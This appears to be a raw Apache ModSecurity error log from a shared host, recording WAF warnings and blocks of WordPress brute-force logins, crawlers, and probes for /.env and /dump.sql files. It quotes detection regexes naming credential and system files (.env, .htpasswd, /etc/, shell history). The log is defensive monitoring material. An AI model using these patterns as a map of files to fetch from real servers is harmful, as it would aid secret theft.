[Tue May 26 13:29:02.515474 2026] [security2:error] [pid 512745:tid 512994] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSxnKSB_s2CvZg7xNokQAAAYE"]
[Tue May 26 13:29:02.595160 2026] [security2:error] [pid 512745:tid 512930] [client 62.244.225.226:4038] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVSxnKSB_s2CvZg7xNomQAAAUE"]
[Tue May 26 13:29:04.807108 2026] [security2:error] [pid 512745:tid 512917] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSyHKSB_s2CvZg7xNowgAAATQ"]
[Tue May 26 13:29:06.787930 2026] [security2:error] [pid 512745:tid 512956] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSynKSB_s2CvZg7xNo5wAAAVs"]
[Tue May 26 13:29:09.295322 2026] [security2:error] [pid 512745:tid 512951] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSzHKSB_s2CvZg7xNpCwAAAVY"]
[Tue May 26 13:29:11.549919 2026] [security2:error] [pid 512745:tid 512938] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSz3KSB_s2CvZg7xNpLgAAAUk"]
[Tue May 26 13:29:13.185477 2026] [security2:error] [pid 512344:tid 512559] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS0MbElyei4S77DQcAYgAAAFU"]
[Tue May 26 13:29:13.876236 2026] [security2:error] [pid 512745:tid 512902] [client 162.12.213.206:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS0XKSB_s2CvZg7xNpUAAAASU"]
[Tue May 26 13:29:15.821840 2026] [security2:error] [pid 512745:tid 512947] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS03KSB_s2CvZg7xNpigAAAVI"]
[Tue May 26 13:29:16.433582 2026] [security2:error] [pid 512745:tid 512932] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVS03KSB_s2CvZg7xNpZwABQxQ"]
[Tue May 26 13:29:17.655990 2026] [security2:error] [pid 512745:tid 512978] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS1XKSB_s2CvZg7xNpqgAAAXE"]
[Tue May 26 13:29:19.915308 2026] [security2:error] [pid 512344:tid 512544] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS18bElyei4S77DQcAqAAAAEY"]
[Tue May 26 13:29:21.834008 2026] [security2:error] [pid 512344:tid 512584] [client 195.178.110.48:55864] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "mail.ktmadvance-senegal.com"] [uri "/"] [unique_id "ahVS2cbElyei4S77DQcA3QAAAG4"]
[Tue May 26 13:29:22.535531 2026] [security2:error] [pid 512344:tid 512587] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS2sbElyei4S77DQcA5AAAAHE"]
[Tue May 26 13:29:23.143899 2026] [security2:error] [pid 512745:tid 512894] [client 31.57.184.107:54584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "arunpandi.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVS23KSB_s2CvZg7xNp-QAAAR0"], referer: https://duckduckgo.com/
[Tue May 26 13:29:23.887196 2026] [security2:error] [pid 512745:tid 512899] [client 185.191.171.9:38682] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVS23KSB_s2CvZg7xNqBwAAASI"]
[Tue May 26 13:29:23.887304 2026] [security2:error] [pid 512745:tid 512899] [client 185.191.171.9:38682] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVS23KSB_s2CvZg7xNqBwAAASI"]
[Tue May 26 13:29:24.838599 2026] [security2:error] [pid 512745:tid 512939] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS3HKSB_s2CvZg7xNqEwAAAUo"]
[Tue May 26 13:29:25.587328 2026] [security2:error] [pid 512745:tid 512971] [client 107.189.14.4:18380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "srsglobalsoft.com"] [uri "/dump.sql"] [unique_id "ahVS3XKSB_s2CvZg7xNqIQAAAWo"], referer: srsglobalsoft.com/dump.sql
[Tue May 26 13:29:27.161120 2026] [security2:error] [pid 512344:tid 512537] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS3sbElyei4S77DQcBHQAAAD8"]
[Tue May 26 13:29:29.075506 2026] [security2:error] [pid 512745:tid 512842] [remote 94.76.235.103:32970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVS4HKSB_s2CvZg7xNqOgABdWA"]
[Tue May 26 13:29:29.430214 2026] [security2:error] [pid 512344:tid 512567] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS4cbElyei4S77DQcBOAAAAF0"]
[Tue May 26 13:29:29.846335 2026] [security2:error] [pid 512344:tid 512483] [client 77.68.9.24:50499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/images/images/cache.php"] [unique_id "ahVS4cbElyei4S77DQcBPgAAAAk"], referer: www.google.com
[Tue May 26 13:29:31.127419 2026] [security2:error] [pid 512745:tid 512913] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS4nKSB_s2CvZg7xNqUQAAATA"]
[Tue May 26 13:29:32.091156 2026] [security2:error] [pid 512745:tid 512898] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVS4nKSB_s2CvZg7xNqWAABIUk"]
[Tue May 26 13:29:32.295829 2026] [security2:error] [pid 512745:tid 512997] [client 95.70.131.179:64085] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVS5HKSB_s2CvZg7xNqawAAAYQ"]
[Tue May 26 13:29:33.879863 2026] [security2:error] [pid 512344:tid 512544] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS5cbElyei4S77DQcBaQAAAEY"]
[Tue May 26 13:29:34.262604 2026] [security2:error] [pid 512344:tid 512578] [client 133.125.102.51:52686] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVS5sbElyei4S77DQcBdQAAAGg"]
[Tue May 26 13:29:34.392215 2026] [autoindex:error] [pid 512745:tid 512979] [client 31.220.88.107:54465] AH01276: Cannot serve directory /home2/atreedfc/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 13:29:37.010641 2026] [security2:error] [pid 512745:tid 512992] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS6HKSB_s2CvZg7xNqqAAAAX8"]
[Tue May 26 13:29:37.307345 2026] [security2:error] [pid 512745:tid 512806] [remote 46.62.185.67:37982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVS6XKSB_s2CvZg7xNqsAABaDw"]
[Tue May 26 13:29:38.264430 2026] [security2:error] [pid 512745:tid 512914] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS6XKSB_s2CvZg7xNqugAAATE"]
[Tue May 26 13:29:40.323727 2026] [security2:error] [pid 512745:tid 512955] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS63KSB_s2CvZg7xNqzAAAAVo"]
[Tue May 26 13:29:40.562997 2026] [security2:error] [pid 512344:tid 512592] [client 77.68.9.24:60875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/images/images/cache.php"] [unique_id "ahVS7MbElyei4S77DQcBwwAAAHY"], referer: www.google.com
[Tue May 26 13:29:42.316299 2026] [security2:error] [pid 512745:tid 512908] [client 95.140.158.207:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVS7XKSB_s2CvZg7xNq2wABKxw"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 13:29:42.679506 2026] [security2:error] [pid 512745:tid 512992] [client 152.59.12.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS7nKSB_s2CvZg7xNq4AAAAX8"]
[Tue May 26 13:29:42.785840 2026] [security2:error] [pid 512745:tid 512962] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS7nKSB_s2CvZg7xNq5QAAAWE"]
[Tue May 26 13:29:44.997387 2026] [security2:error] [pid 512745:tid 512960] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS8HKSB_s2CvZg7xNrCQAAAV8"]
[Tue May 26 13:29:46.449807 2026] [security2:error] [pid 512745:tid 512997] [client 176.65.139.231:33404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ucdc.co.in"] [uri "/.env"] [unique_id "ahVS8nKSB_s2CvZg7xNrKgAAAYQ"]
[Tue May 26 13:29:46.820353 2026] [security2:error] [pid 512745:tid 512930] [client 85.208.96.203:17464] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/homepages/shop-classic/"] [unique_id "ahVS8nKSB_s2CvZg7xNrNQAAAUE"]
[Tue May 26 13:29:46.820462 2026] [security2:error] [pid 512745:tid 512930] [client 85.208.96.203:17464] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/homepages/shop-classic/"] [unique_id "ahVS8nKSB_s2CvZg7xNrNQAAAUE"]
[Tue May 26 13:29:46.944716 2026] [security2:error] [pid 512745:tid 512878] [client 176.65.139.235:60312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS8nKSB_s2CvZg7xNrOQAAAQ0"]
[Tue May 26 13:29:47.433358 2026] [security2:error] [pid 512745:tid 512906] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS83KSB_s2CvZg7xNrPAAAASk"]
[Tue May 26 13:29:47.433707 2026] [security2:error] [pid 512745:tid 512953] [client 176.65.139.237:39702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.himmatnagar.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS83KSB_s2CvZg7xNrRgAAAVg"]
[Tue May 26 13:29:47.518694 2026] [security2:error] [pid 512344:tid 512521] [client 176.65.139.235:60328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.surat.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS88bElyei4S77DQcCBgAAAC8"]
[Tue May 26 13:29:47.797553 2026] [security2:error] [pid 512344:tid 512557] [client 176.65.139.231:56922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.omr.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS88bElyei4S77DQcCCwAAAFM"]
[Tue May 26 13:29:47.815291 2026] [security2:error] [pid 512745:tid 512989] [client 95.140.158.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclub.in"] [uri "/wp-admin/plugins.php"] [unique_id "ahVS83KSB_s2CvZg7xNrPQABfEU"], referer: https://kingsclub.in/wp-login.php?redirect_to=https%3A%2F%2Fkingsclub.in%2Fwp-admin%2F&reauth=1
[Tue May 26 13:29:49.471475 2026] [security2:error] [pid 512745:tid 512932] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVS9HKSB_s2CvZg7xNrVwABQ1Q"]
[Tue May 26 13:29:49.598759 2026] [security2:error] [pid 512745:tid 512972] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS9XKSB_s2CvZg7xNrYQAAAWs"]
[Tue May 26 13:29:49.629476 2026] [security2:error] [pid 512745:tid 512992] [client 176.65.139.234:23818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.soft.ucdc.co.in"] [uri "/.env"] [unique_id "ahVS9XKSB_s2CvZg7xNrcAAAAX8"]
[Tue May 26 13:29:50.312029 2026] [security2:error] [pid 512745:tid 512882] [client 95.70.131.179:64041] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVS9XKSB_s2CvZg7xNrcwAAARE"]
[Tue May 26 13:29:50.635183 2026] [security2:error] [pid 512344:tid 512422] [remote 46.101.54.125:53792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVS9sbElyei4S77DQcCJQAAbk0"]
[Tue May 26 13:29:50.926587 2026] [security2:error] [pid 512344:tid 512407] [remote 49.12.3.147:34556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVS9sbElyei4S77DQcCMgAAXz4"]
[Tue May 26 13:29:51.021825 2026] [security2:error] [pid 512344:tid 512494] [client 45.66.35.24:35344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.35.66.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-login.php"] [unique_id "ahVS9sbElyei4S77DQcCMwAAABQ"]
[Tue May 26 13:29:51.555267 2026] [security2:error] [pid 512745:tid 512988] [client 45.66.35.24:34940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.35.66.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-login.php"] [unique_id "ahVS93KSB_s2CvZg7xNreQAAAXs"]
[Tue May 26 13:29:51.681972 2026] [security2:error] [pid 512344:tid 512528] [client 16.148.188.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVS98bElyei4S77DQcCQwAAADY"]
[Tue May 26 13:29:51.790382 2026] [security2:error] [pid 512745:tid 512883] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS93KSB_s2CvZg7xNreAAAARI"]
[Tue May 26 13:29:51.851121 2026] [security2:error] [pid 512344:tid 512521] [client 16.148.188.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVS98bElyei4S77DQcCRwAAAC8"]
[Tue May 26 13:29:53.995305 2026] [security2:error] [pid 512745:tid 512998] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS-XKSB_s2CvZg7xNrlQAAAYU"]
[Tue May 26 13:29:54.318404 2026] [security2:error] [pid 512745:tid 512746] [remote 47.128.47.123:39848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/cicodev-afrique-appelle-letat-du-senegal-a-relativiser-la-promotion-de-la-privatisation-des-soins-de-sante/contact/"] [unique_id "ahVS-nKSB_s2CvZg7xNrqQABeAA"]
[Tue May 26 13:29:54.582888 2026] [security2:error] [pid 512745:tid 512882] [client 34.147.88.45:32768] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "webdisk.consultrgb.com"] [uri "/"] [unique_id "ahVS-nKSB_s2CvZg7xNrsgAAARE"]
